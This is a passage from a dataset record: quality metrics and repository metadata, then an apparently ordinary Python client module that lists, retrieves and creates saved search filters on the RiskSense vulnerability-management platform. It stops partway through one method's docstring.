| qsc_code_frac_chars_top_3grams_quality_signal | 0.081692 |
| qsc_code_frac_chars_top_4grams_quality_signal | 0.091251 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | 0.888934 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | 0.878969 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | 0.861124 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | 0.857358 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | 0.825666 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | 0.819119 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | 0 |
| qsc_code_frac_chars_digital_quality_signal | 0.020004 |
| qsc_code_frac_chars_whitespace_quality_signal | 0.261522 |
| qsc_code_size_file_byte_quality_signal | 28,770 |
| qsc_code_num_lines_quality_signal | 907 |
| qsc_code_num_chars_line_max_quality_signal | 93 |
| qsc_code_num_chars_line_mean_quality_signal | 31.719956 |
| qsc_code_frac_chars_alphabet_quality_signal | 0.792384 |
| qsc_code_frac_chars_comments_quality_signal | 0.001668 |
| qsc_code_cate_xml_start_quality_signal | 0 |
| qsc_code_frac_lines_dupe_lines_quality_signal | 0.746803 |
| qsc_code_cate_autogen_quality_signal | 0 |
| qsc_code_frac_lines_long_string_quality_signal | 0 |
| qsc_code_frac_chars_string_length_quality_signal | 0.222832 |
| qsc_code_frac_chars_long_word_length_quality_signal | 0.136108 |
| qsc_code_frac_lines_string_concat_quality_signal | 0 |
| qsc_code_cate_encoded_data_quality_signal | 0 |
| qsc_code_frac_chars_hex_words_quality_signal | 0 |
| qsc_code_frac_lines_prompt_comments_quality_signal | 0 |
| qsc_code_frac_lines_assert_quality_signal | 0.066496 |
| qsc_codepython_cate_ast_quality_signal | 1 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | 0 |
| qsc_codepython_cate_var_zero_quality_signal | false |
| qsc_codepython_frac_lines_pass_quality_signal | 0 |
| qsc_codepython_frac_lines_import_quality_signal | 0.019182 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | 0 |
| qsc_codepython_score_lines_no_logic_quality_signal | 0.019182 |
| qsc_codepython_frac_lines_print_quality_signal | 0 |
| qsc_code_num_words | 0 |
| qsc_code_num_chars | 0 |
| qsc_code_mean_word_length | 0 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | 0 |
| qsc_code_frac_chars_top_3grams | 0 |
| qsc_code_frac_chars_top_4grams | 0 |
| qsc_code_frac_chars_dupe_5grams | 1 |
| qsc_code_frac_chars_dupe_6grams | 1 |
| qsc_code_frac_chars_dupe_7grams | 1 |
| qsc_code_frac_chars_dupe_8grams | 1 |
| qsc_code_frac_chars_dupe_9grams | 1 |
| qsc_code_frac_chars_dupe_10grams | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 |
| qsc_code_frac_chars_digital | 0 |
| qsc_code_frac_chars_whitespace | 0 |
| qsc_code_size_file_byte | 0 |
| qsc_code_num_lines | 0 |
| qsc_code_num_chars_line_max | 0 |
| qsc_code_num_chars_line_mean | 0 |
| qsc_code_frac_chars_alphabet | 0 |
| qsc_code_frac_chars_comments | 0 |
| qsc_code_cate_xml_start | 0 |
| qsc_code_frac_lines_dupe_lines | 1 |
| qsc_code_cate_autogen | 0 |
| qsc_code_frac_lines_long_string | 0 |
| qsc_code_frac_chars_string_length | 0 |
| qsc_code_frac_chars_long_word_length | 0 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | 0 |
| qsc_code_frac_chars_hex_words | 0 |
| qsc_code_frac_lines_prompt_comments | 0 |
| qsc_code_frac_lines_assert | 0 |
| qsc_codepython_cate_ast | 0 |
| qsc_codepython_frac_lines_func_ratio | 0 |
| qsc_codepython_cate_var_zero | 0 |
| qsc_codepython_frac_lines_pass | 0 |
| qsc_codepython_frac_lines_import | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 |
| qsc_codepython_score_lines_no_logic | 0 |
| qsc_codepython_frac_lines_print | 0 |
| effective | 0 |
| hits | 7 |
Row 3

| Field | Value |
|---|---|
| hexsha | bc4238f3fd29874cef96bf0ba9098dad50aa9c49 |
| size | 109,357 |
| ext | py |
| lang | Python |
| max_stars_repo_path | packages/risksense_api/__subject/__filters/__filters.py |
| max_stars_repo_name | PRASANTHBHARADHWAAJ/risksense_tools |
| max_stars_repo_head_hexsha | d9f95ac3c7107bb4114c958455c7194211ff951b |
| max_stars_repo_licenses | ["Apache-2.0"] |
| max_stars_count | 4 |
| max_stars_repo_stars_event_min_datetime | 2020-12-24T15:20:23.000Z |
| max_stars_repo_stars_event_max_datetime | 2021-12-26T17:41:46.000Z |
| max_issues_repo_path | packages/risksense_api/__subject/__filters/__filters.py |
| max_issues_repo_name | PRASANTHBHARADHWAAJ/risksense_tools |
| max_issues_repo_head_hexsha | d9f95ac3c7107bb4114c958455c7194211ff951b |
| max_issues_repo_licenses | ["Apache-2.0"] |
| max_issues_count | 4 |
| max_issues_repo_issues_event_min_datetime | 2020-10-08T19:53:36.000Z |
| max_issues_repo_issues_event_max_datetime | 2020-11-11T20:52:36.000Z |
| max_forks_repo_path | packages/risksense_api/__subject/__filters/__filters.py |
| max_forks_repo_name | PRASANTHBHARADHWAAJ/risksense_tools |
| max_forks_repo_head_hexsha | d9f95ac3c7107bb4114c958455c7194211ff951b |
| max_forks_repo_licenses | ["Apache-2.0"] |
| max_forks_count | 2 |
| max_forks_repo_forks_event_min_datetime | 2021-06-18T01:27:31.000Z |
| max_forks_repo_forks_event_max_datetime | 2021-12-20T03:19:31.000Z |

content:

```python
""" *******************************************************************************************************************
|
| Name : __filters.py
| Module : risksense_api
| Description : A class to be used for interacting with filters on the RiskSense Platform.
| Copyright : (c) RiskSense, Inc.
| License : Apache-2.0 (http://www.apache.org/licenses/LICENSE-2.0)
|
******************************************************************************************************************* """
import json
from ...__subject import Subject
from ..._api_request_handler import *
class FilterSubject:
""" FilterSubject class and params"""
APPLICATION = "application"
APPLICATION_FINDING = "applicationFinding"
APPLICATION_MANUAL_EXPLOIT = "applicationManualExploit"
APPLICATION_URL = "applicationUrl"
ASSESSMENT = "assessment"
CLIENT = "client"
DATABASE = "database"
DATABASE_FINDING = "databaseFinding"
GROUP = "group"
HOST = "host"
HOST_FINDING = "hostFinding"
HOST_MANUAL_EXPLOIT = "hostManualExploit"
NETWORK = "network"
PATCH = "patch"
TAG = "tag"
UNIQUE_APPLICATION_FINDING = "uniqueApplicationFinding"
UNIQUE_HOST_FINDING = "uniqueHostFinding"
USER = "user"
class Filters(Subject):
""" Filters class """
def __init__(self, profile):
"""
Initialization of Filters object.
:param profile: Profile Object
:type profile: _profile
"""
self.subject_name = "filter"
Subject.__init__(self, profile, self.subject_name)
self.alt_api_base_url = self.profile.platform_url + "/api/v1/client/{}/search/{}/filter"
def list_filters(self, filter_subject, client_id=None):
"""
List all saved filters available for the specified filter_subject.
:param filter_subject: Supported Subjects are: FilterSubject.APPLICATION
FilterSubject.APPLICATION_FINDING
FilterSubject.APPLICATION_MANUAL_EXPLOIT
FilterSubject.APPLICATION_URL
FilterSubject.ASSESSMENT
FilterSubject.CLIENT
FilterSubject.DATABASE
FilterSubject.DATABASE_FINDING
FilterSubject.GROUP
FilterSubject.HOST
FilterSubject.HOST_FINDING
FilterSubject.HOST_MANUAL_EXPLOIT
FilterSubject.NETWORK
FilterSubject.PATCH
FilterSubject.TAG
FilterSubject.UNIQUE_APPLICATION_FINDING
FilterSubject.UNIQUE_HOST_FINDING
FilterSubject.USER
:type filter_subject: FilterSubject attribute
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
url = self.alt_api_base_url.format(str(client_id), filter_subject)
try:
raw_response = self.request_handler.make_request(ApiRequestHandler.GET, url)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
jsonified_response = json.loads(raw_response.text)
return jsonified_response
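# Hypothetical usage (illustrative, not part of this module):
#   filters = Filters(profile)
#   app_filters = filters.list_filters(FilterSubject.APPLICATION, client_id=123)
# The convenience wrappers below (list_application_filters, ...) simply fix
# the filter_subject argument and delegate to this method.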
def list_application_filters(self, client_id=None):
"""
List application filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.APPLICATION, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_appfinding_filters(self, client_id=None):
"""
List application finding filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.APPLICATION_FINDING, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_app_manual_exploit_filters(self, client_id=None):
"""
List application manual exploit filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.APPLICATION_MANUAL_EXPLOIT, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_app_url_filters(self, client_id=None):
"""
List application URL filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.APPLICATION_URL, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_assessment_filters(self, client_id=None):
"""
List assessment filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.ASSESSMENT, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_client_filters(self, client_id=None):
"""
List client filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.CLIENT, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_database_filters(self, client_id=None):
"""
List database filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.DATABASE, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_database_finding_filters(self, client_id=None):
"""
List database finding filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.DATABASE_FINDING, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_group_filters(self, client_id=None):
"""
List group filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.GROUP, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_host_filters(self, client_id=None):
"""
List host filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.HOST, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_hostfinding_filters(self, client_id=None):
"""
List host finding filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
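
        Example (illustrative; assumes filters is a Filters instance and
        relies on the profile's default client ID):

            >>> hf_filters = filters.list_hostfinding_filters()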
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.HOST_FINDING, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_host_manual_exploit_filters(self, client_id=None):
"""
List host manual exploit filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.HOST_MANUAL_EXPLOIT, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_network_filters(self, client_id=None):
"""
List network filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.NETWORK, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_patch_filters(self, client_id=None):
"""
List patch filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.PATCH, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_tag_filters(self, client_id=None):
"""
List tag filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.TAG, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_unique_appfinding_filters(self, client_id=None):
"""
List unique application finding filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.UNIQUE_APPLICATION_FINDING, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_unique_hostfinding_filters(self, client_id=None):
"""
List unique host finding filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.UNIQUE_HOST_FINDING, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_user_filters(self, client_id=None):
"""
List user filters
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.list_filters(FilterSubject.USER, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def list_system_filters(self, filter_subject, client_id=None):
"""
List System Filters.
:param filter_subject: Supported Subjects are:
FilterSubject.APPLICATION
FilterSubject.APPLICATION_FINDING
FilterSubject.APPLICATION_MANUAL_EXPLOIT
FilterSubject.APPLICATION_URL
FilterSubject.ASSESSMENT
FilterSubject.CLIENT
FilterSubject.DATABASE
FilterSubject.DATABASE_FINDING
FilterSubject.GROUP
FilterSubject.HOST
FilterSubject.HOST_FINDING
FilterSubject.HOST_MANUAL_EXPLOIT
FilterSubject.NETWORK
FilterSubject.PATCH
FilterSubject.TAG
FilterSubject.UNIQUE_APPLICATION_FINDING
FilterSubject.UNIQUE_HOST_FINDING
FilterSubject.USER
:type filter_subject: str
:param client_id: Client ID
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
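
        Example (illustrative; assumes filters is a Filters instance, and the
        client ID is a placeholder):

            >>> system_filters = filters.list_system_filters(FilterSubject.HOST, client_id=123)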
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
url = self.api_base_url.format(str(client_id)) + "/{}/filter".format(filter_subject)
try:
raw_response = self.request_handler.make_request(ApiRequestHandler.GET, url)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
jsonified_response = json.loads(raw_response.text)
return jsonified_response
def get_specific_sys_filter(self, filter_subject, filter_id, client_id=None):
"""
Get a specific system filter.
:param filter_subject: Supported Subjects are:
FilterSubject.APPLICATION
FilterSubject.APPLICATION_FINDING
FilterSubject.APPLICATION_MANUAL_EXPLOIT
FilterSubject.APPLICATION_URL
FilterSubject.ASSESSMENT
FilterSubject.CLIENT
FilterSubject.DATABASE
FilterSubject.DATABASE_FINDING
FilterSubject.GROUP
FilterSubject.HOST
FilterSubject.HOST_FINDING
FilterSubject.HOST_MANUAL_EXPLOIT
FilterSubject.NETWORK
FilterSubject.PATCH
FilterSubject.TAG
FilterSubject.UNIQUE_APPLICATION_FINDING
FilterSubject.UNIQUE_HOST_FINDING
FilterSubject.USER
:type filter_subject: str
:param filter_id: Filter ID to get
:type filter_id: int
:param client_id: Client ID
:type client_id: int
:return: The JSON output from the platform is returned, listing the available filters.
:rtype: dict
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
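
        Example (illustrative; the filter and client IDs are placeholders):

            >>> sys_filter = filters.get_specific_sys_filter(FilterSubject.HOST, filter_id=7, client_id=123)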
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
url = self.api_base_url.format(str(client_id)) + "/{}/filter/{}".format(filter_subject, str(filter_id))
try:
raw_response = self.request_handler.make_request(ApiRequestHandler.GET, url)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
jsonified_response = json.loads(raw_response.text)
return jsonified_response
def create(self, filter_subject, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved filter.
:param filter_subject: Supported Subjects are:
FilterSubject.APPLICATION
FilterSubject.APPLICATION_FINDING
FilterSubject.APPLICATION_MANUAL_EXPLOIT
FilterSubject.APPLICATION_URL
FilterSubject.ASSESSMENT
FilterSubject.CLIENT
FilterSubject.DATABASE
FilterSubject.DATABASE_FINDING
FilterSubject.GROUP
FilterSubject.HOST
FilterSubject.HOST_FINDING
FilterSubject.HOST_MANUAL_EXPLOIT
FilterSubject.NETWORK
FilterSubject.PATCH
FilterSubject.TAG
FilterSubject.UNIQUE_APPLICATION_FINDING
FilterSubject.UNIQUE_HOST_FINDING
FilterSubject.USER
:type filter_subject: str
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
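
        Example (illustrative sketch; the filter dictionary below shows an
        assumed shape for platform search filters, not a definitive schema --
        consult the platform's search documentation for valid fields):

            >>> new_id = filters.create(
            ...     FilterSubject.HOST_FINDING,
            ...     filter_name="Critical open findings",
            ...     filter_list=[{
            ...         "field": "severity",     # hypothetical field name
            ...         "exclusive": False,
            ...         "operator": "RANGE",     # assumed operator value
            ...         "value": "9,10"
            ...     }],
            ...     shared=False
            ... )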
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
url = self.alt_api_base_url.format(str(client_id), filter_subject)
body = {
"name": filter_name,
"filters": filter_list,
"shared": shared
}
try:
raw_response = self.request_handler.make_request(ApiRequestHandler.POST, url, body=body)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
jsonified_response = json.loads(raw_response.text)
filter_id = jsonified_response['id']
return filter_id
def create_application_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved application filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.APPLICATION, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_appfinding_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved application finding filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.APPLICATION_FINDING, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_app_manual_exploit_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved application manual exploit filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.APPLICATION_MANUAL_EXPLOIT, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_application_url_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved application URL filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.APPLICATION_URL, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_assessment_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved assessment filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.ASSESSMENT, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_client_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved client filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.CLIENT, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_database_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved database filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.DATABASE, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_dbfinding_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved database finding filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.DATABASE_FINDING, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_group_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved group filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.GROUP, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_host_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved host filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.HOST, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_hostfinding_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved host finding filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
:param filter_list: A list of dictionaries containing the filter parameters.
:type filter_list: list
:param shared: True/False reflecting whether or not this filter should be shared.
:type shared: bool
:param client_id: Client ID. If an ID isn't passed, will use the profile's default Client ID.
:type client_id: int
:return: The ID of the new filter is returned.
:rtype: int
:raises RequestFailed:
:raises StatusCodeError:
:raises MaxRetryError:
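
        Example (illustrative; my_filter_list is a placeholder for a list of
        filter dictionaries such as the one shown in Filters.create):

            >>> new_id = filters.create_hostfinding_filter("My saved search", my_filter_list)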
"""
if client_id is None:
client_id = self._use_default_client_id()[0]
try:
returned_response = self.create(FilterSubject.HOST_FINDING, filter_name, filter_list, shared, client_id)
except (RequestFailed, StatusCodeError, MaxRetryError):
raise
return returned_response
def create_host_manual_exploit_filter(self, filter_name, filter_list, shared=False, client_id=None):
"""
Creates a new saved host manual exploit filter.
:param filter_name: The name to use for the new filter
:type filter_name: str
